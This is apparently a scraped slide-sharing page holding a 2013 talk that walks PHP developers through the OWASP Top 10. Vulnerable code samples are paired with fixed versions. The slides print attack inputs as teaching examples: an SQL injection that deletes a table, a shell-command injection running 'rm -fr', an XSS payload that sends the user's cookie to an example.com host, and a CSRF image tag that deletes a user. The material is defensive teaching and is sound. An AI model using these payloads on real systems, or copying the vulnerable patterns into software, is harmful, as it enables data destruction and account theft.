Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Angeliki Cooney
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamUiPathCommunity
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfOverkill Security
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKJago de Vreede
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 

Dernier (20)

"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 

OWASP TOP 10 for PHP Programmers

  • 1. Follow this topic: @rjsmelo, #owasp, #php, #appsec OWASP TOP 10 for PHP programmers RICARDO MELO Presented at #PHPLX – 11 September 2013
  • 2. @rjsmelo 2 RICARDO MELO ● CTO @ DRI ● PHP, Mysql, Linux and lots of other OSS ● ZCE, RHCE, LPI 3, ITIL, etc ● +10 years building (and breaking) things
  • 3. @rjsmelo 3 About ● 14 Year old academic spin-off ● Pragmatic OSS Orientation ● PHP, Mysql, SugarCRM, Drupal, JavaScript, Linux, etc. ● Crafters, Integrators ● Always looking for software developers – Yes, right now!
  • 4. 1999 - 2013 DRI. Some Rights Reserved . 4 Outline ● OWASP ● OWASP TOP 10 ● What's Next ● Conclusions
  • 5. 1999 - 2013 DRI. Some Rights Reserved . 5 What is OWASP? ● Open Web Application Security Project ● World wide non-for-profit ● Focus on security improvement and awareness ● Very active community ● Lots of projects (you can start yours)
  • 6. 1999 - 2013 DRI. Some Rights Reserved . 6 What is OWASP TOP 10 ● The name is “The Top 10 Most Critical Web Application Risks” ● The focus is awareness ● Released 2003, 2004, 2007, 2010 and 2013 https://www.owasp.org/index.php/Top_10_2013
  • 7. 1999 - 2013 DRI. Some Rights Reserved . 7 Risk ? Thread Agent Attack Vectors Weakness Prevalence Weakness Detectability Technical Impacts Business Impacts Application Specific EASY WIDESPREAD EASY SEVERE Application / Business Specific AVERAGE COMMON AVERAGE MODERATE DIFFICULT UNCOMMON DIFFICULT MINOR
  • 8. 1999 - 2013 DRI. Some Rights Reserved . 8 OWASP TOP 10 - 2013 ● A1 – Injection ● A2 – Broken Authentication and Session Management ● A3 – Cross-site Scripting (XSS) ● A4 – Insecure Direct Object References ● A5 – Security Misconfiguration ● A6 – Sensitive Data Exposure ● A7 – Missing Function Level Access Control ● A8 – Cross Site Request Forgery (CSRF) ● A9 – Using Components with Known Vulnerabilities ● A10 – Unvalidated Redirects and Forwards
  • 9. 1999 - 2013 DRI. Some Rights Reserved . 9 A1 - Injection ● Occurs when untrusted data is sent directly to the interpreter! ● Not only SQL: NoSQL, Ldap, OS, XML, Xpath! ● Never, NEVER trust ANY input!
  • 10. 1999 - 2013 DRI. Some Rights Reserved . 10 A1 – Injection Examples - SQL <?php // prune to sql injection // script.php?start_record=20 $db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password'); $stmt = $db->query( "SELECT * FROM some_table limit " . $_REQUEST['start_record'] . ",10"); $result = $stmt->fetchAll(PDO::FETCH_ASSOC); echo function_to_render_result($result); // what if I set record = "1; delete from some_table; -- " <?php // script.php?start_record=20 $db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password'); $stmt = $db->prepare("SELECT * FROM some_table limit ?,10"); $stmt->execute(array($_REQUEST['start_record'])); $result = $stmt->fetchAll(PDO::FETCH_ASSOC); echo function_to_render_result($result);
  • 11. 1999 - 2013 DRI. Some Rights Reserved . 11 A1 - Injection Samples - OS <?php // script.php?file=xpto.pdf $fileType = exec( "file " . $_REQUEST['file']); echo $fileType; // but one can try with "xpto.pdf; rm -fr /some/folder" <?php // script.php?file=xpto.pdf $fileType = exec( "file " . escapeshellarg($_REQUEST['file'])); echo $fileType;
  • 12. 1999 - 2013 DRI. Some Rights Reserved . 12 A2 – Broken Authentication and Session Management ● Broken implementations allowing attacker to assume “other” user's identity! ● Can be session hijack/fixation ● Broken authentication ● Or other fails that lead to compromise passwords / keys / session tokens
  • 13. 1999 - 2013 DRI. Some Rights Reserved . 13 A2 – Session Fixation <?php // Prune to session fixation // [ ... ] $userDetails = check_credentials($username, $password); if ( $userDetails !== false ) { $_SESSION['userIsLoggedin'] = true; $_SESSION['userInformation'] = $userDetails; } // [ ... ] <?php // [ ... ] $userDetails = check_credentials($username, $password); if ( $userDetails !== false ) { session_regenerate_id(); $_SESSION['userIsLoggedin'] = true; $_SESSION['userInformation'] = $userDetails; } // [ ... ]
  • 14. 1999 - 2013 DRI. Some Rights Reserved . 14 A3 – Cross-Site Scripting (XSS) ● Whenever untrusted data is sent to the browser without proper validation and escaping! ● XSS allows the attacker to OWN the victims browser and do ... everything! ● Stored, Reflected and DOM based XSS
  • 15. 1999 - 2013 DRI. Some Rights Reserved . 15 A3 – steal user cookie <?php // page prune to XSS // script.php?search=hello $results = some_search_function($_REQUEST['search']); ?> <html> <body> <p>results for : <?= $_REQUEST['search']; ?> <?= render_results($results); ?> </body> </html> // set search to: "<script>document.location='http://www.example.com/precious_cookie ?cookie='+document.cookie</script>" <?php // page prune to XSS // script.php?search=hello $results = some_search_function($_REQUEST['search']); ?> <html> <body> <p>results for : <?= htmlentities($_REQUEST['search'],ENT_COMPAT|ENT_HTML401,'UTF-8'); ?> <?= render_results($results); ?> </body> </html>
  • 16. 1999 - 2013 DRI. Some Rights Reserved . 16 A4 – Insecure Direct Object Reference ● Whenever developer exposes references to internal objects and don't have proper access control. ● Attackers can change the references and access resources that shouldn't be accessible.
  • 17. 1999 - 2013 DRI. Some Rights Reserved . 17 A4 – Access other user account <?php // prune to insecure direct reference // script.php?account=10 $accountId = intval($_REQUEST['account']); $account = new Account($accountId); echo render_account_info($account); // and if I change account to "9" ? <?php // script.php?account=10 $user = new User($_SESSION['userInfo']); $accountId = intval($_REQUEST['account']); $account = new Account($accountId); if ( $account->canRead($user)) { echo render_account_info($account); } else { echo "Access denied"; }
  • 18. 1999 - 2013 DRI. Some Rights Reserved . 18 A5 – Security Misconfiguration ● Often fails in securing the full stack leads to application / servers being compromised. ● Take into consideration other services / applications running in the same infrastructure ● Watch out for outdated software ● Watch out for default accounts
  • 19. 1999 - 2013 DRI. Some Rights Reserved . 19 A6 – Sensitive Data Exposure ● Whenever sensitive data isn't properly protected allowing attackers to steal or modify that information. ● Credit Card fraud, Identity theft, etc! ● Be aware, data should be protected both in transit or on the storage engine (don't forget the backups)
  • 20. 1999 - 2013 DRI. Some Rights Reserved . 20 A7 – Missing Function Level Access Control ● Most applications validate function based access control before displaying options in UI, but fail to validate when the function is accessed. ● Attacker can forge request to functions that shouldn't be available
  • 21. 1999 - 2013 DRI. Some Rights Reserved . 21 A7 – insecure function <?php // prune to insecure function access // script.php?user=john&action=read $userId = $_REQUEST['user']; $action = $_REQUEST['action']; $user = new User($userId); switch($action) { case 'read': echo render_user($user); break; case 'delete': $user->delete(); echo "user Deleted"; break; } // and if I change action to "delete"? <?php $userId = $_REQUEST['user']; $action = $_REQUEST['action']; $loggedUser = new AppUser($_SESSION['userInfo']); $user = new User($userId); switch($action) { case 'read': if ( $user->canRead($loggedUser) ){ echo render_user($user); } break; case 'delete': if ( $user->canDelete($loggedUser) ){ $user->delete(); echo "user Deleted"; } break; }
  • 22. 1999 - 2013 DRI. Some Rights Reserved . 22 A8 – Cross Site Request Forgery (CSRF) ● CSRF forces a victim's browser to send a forged HTTP request to a vulnerable web application (normally taking advantage of an existing user session) ● No difference from user generated requests!
  • 23. 1999 - 2013 DRI. Some Rights Reserved . 23 A8 – delete user <?php // vulnerable app // delete.php?id=123 $id = intval($_REQUEST['id']); $user = new User($id); $loggedUser = new AppUser($_SESSION['userInfo']); if ( $user->canDelete($loggedUser) ){ $user->delete(); } ?> // attackers site: <img src="http://www.example.com/users/delete.php?id=123" /> <?php // vulnerable app $id = intval($_REQUEST['id']); $user = new User($id); $loggedUser = new AppUser($_SESSION['userInfo']); if (validate_token($_REQUEST['token'])) { if ( $user->canDelete($loggedUser) ){ $user->delete(); } }
  • 24. 1999 - 2013 DRI. Some Rights Reserved . 24 A9 – Using Components with know Vulnerabilities ● Whenever you use libraries, frameworks, or other software modules with known vulnerabilities. ● Attackers can leverage this issues to attack your application / server / etc.
  • 25. 1999 - 2013 DRI. Some Rights Reserved . 25 A10 – Unvalidated Redirects and Forwards ● Web application often redirects users to other pages, using untrusted data to determine the destination pages. ● Atackers can redirect victims to phishing or malware pages or use forwards to access unauthorized pages.
  • 26. 1999 - 2013 DRI. Some Rights Reserved . 26 A10 – “simple” Forward <?php class someController extends baseController { public function preFunction($args,$action) { $this->checkAccess($args, $action); } public function indexAction($args) { // [...] do something here if ( $args['callback'] && method_exists($this,$args['callback'])){ unset($args['callback']); call_user_func_array(array($this,$args['callback']),$args); } return $response; } public function destroyAction($args) { $this->selfTerminate(); } } if ( $args['callback'] && method_exists($this,$args['callback'])){ $this->preFunction($args,$args['callback']); unset($args['callback']); call_user_func_array(array($this,$args['callback']),$args); }
  • 27. 1999 - 2013 DRI. Some Rights Reserved . 27 What's Next For PHP Programmers ● OWASP – http://goo.gl/lVRRY ● Cheat Sheets – http://goo.gl/lVRRY ● OWASP Zed Attack Proxy – http://goo.gl/QE5v1H ● OWASP Books – free – http://goo.gl/aLx1q2
  • 28. 1999 - 2013 DRI. Some Rights Reserved . 28 Conclusions ● Keep the application secure is a continuous process ● Avoiding the TOP 10 Risks don't make your application secure, but is already a HUGE step forward. ● Don't trust ANY input! Escape every output!
  • 30. Follow this topic: @rjsmelo, #owasp, #php, #appsec QA Feedback: https://joind.in/9107